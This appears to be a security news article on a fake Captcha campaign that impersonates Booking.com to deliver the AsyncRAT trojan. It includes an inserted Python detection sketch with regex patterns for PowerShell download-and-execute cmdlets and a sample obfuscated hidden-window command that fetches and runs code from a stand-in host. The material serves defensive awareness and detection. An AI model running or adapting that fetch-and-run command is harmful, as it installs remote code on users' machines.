Hackers milking fake Booking.com sites to plant malware


In a new campaign, cybercriminals disseminate malicious links on gaming sites and social media and even buy sponsored ads on search engines to trick users into opening fraudulent websites impersonating Booking.com.

Malwarebytes Labs is warning about users getting infected with AsyncRat, a backdoor remote access trojan (RAT) designed to monitor and control computers and gather sensitive and financial information, leading to financial damages and even identity theft.

The cybercriminals abuse a well-documented fake Captcha scheme, with the twist that they impersonate Booking.com, one of the largest online travel agencies.

“Forty percent of people book travel through a general online search, creating a lot of opportunities for scammers,” the researchers explain in a report.

The campaign started in mid-May, and hackers rotate malicious links every two to three days.

If an unsuspecting victim clicks on an ad or a link elsewhere, the landing page first asks them to prove they’re not robots by performing a few simple steps.

However, the imposed instructions are designed to trick users into loading the malware themselves.

“By putting a checkmark in the fake Captcha prompt, you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals,” Malwarebytes warns.

Chrome may issue a warning that the fake website wants to see text and images copied to the clipboard, but it is vague and may be unclear to many users, as it doesn’t reflect the hacker’s intent.

So what’s happening behind the scenes?

The user launches a Run box and pastes a script into it. The script is disguised using mixed casing, quote interruption, and variable name manipulation, so the user won’t suspect anything. It then opens a hidden PowerShell window, downloads the RAT, and installs it.
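
Defenders reviewing process-creation logs can undo the casing and quote tricks before matching on the command line. The sketch below is an added example, not code from the Malwarebytes report; the indicator list and the sample command lines are constructed for illustration, and variable name manipulation is not handled.

```python
import re

# Characters inserted to break up keywords without changing how the shell
# reads them: quotes, cmd carets, PowerShell backticks.
_INTERRUPTERS = re.compile(r"[\"'^`]")

# Indicators matched after normalization (illustrative, not exhaustive).
_INDICATORS = {
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b"),
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+(hidden|1)\b"),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b"),
    "execute": re.compile(r"\b(iex|invoke-expression)\b"),
}

def normalize(cmd: str) -> str:
    """Strip interrupting characters, collapse whitespace, fold case."""
    return re.sub(r"\s+", " ", _INTERRUPTERS.sub("", cmd)).strip().lower()

def assess(cmd: str) -> dict:
    """Return the normalized command, matched indicators and a verdict."""
    norm = normalize(cmd)
    hits = sorted(name for name, rx in _INDICATORS.items() if rx.search(norm))
    # Suspicious: PowerShell with a hidden window, or with fetch-and-run.
    suspicious = "powershell" in hits and (
        "hidden_window" in hits or {"download", "execute"} <= set(hits))
    return {"normalized": norm, "hits": hits, "suspicious": suspicious}

# Constructed sample command lines (example.invalid never resolves).
SAMPLES = [
    'pOwErS"h"eLl -W"in"dowStyle Hidden -c "i`wr https://example.invalid/a | i`ex"',
    'notepad.exe C:\\Users\\Public\\notes.txt',
    'powershell -NoProfile -Command Get-Date',
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = assess(line)
        print(result["suspicious"], result["hits"], "<-", line)
```

Matching the raw string for `powershell` or `hidden` would miss the first sample; only the normalized form exposes both.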

Hackers have already been observed using at least 14 different website addresses in this campaign. Malwarebytes recommends never following suspicious instructions, especially those provided by websites visited without thought. Using an anti-malware solution and a browser extension that blocks domains and scams can help avoid the threat.

Booking.com is a frequently used lure by cybercriminals. Hackers also previously targeted hosts on the platform with credential-stealing malware, and launched phishing scams targeting hotel staff.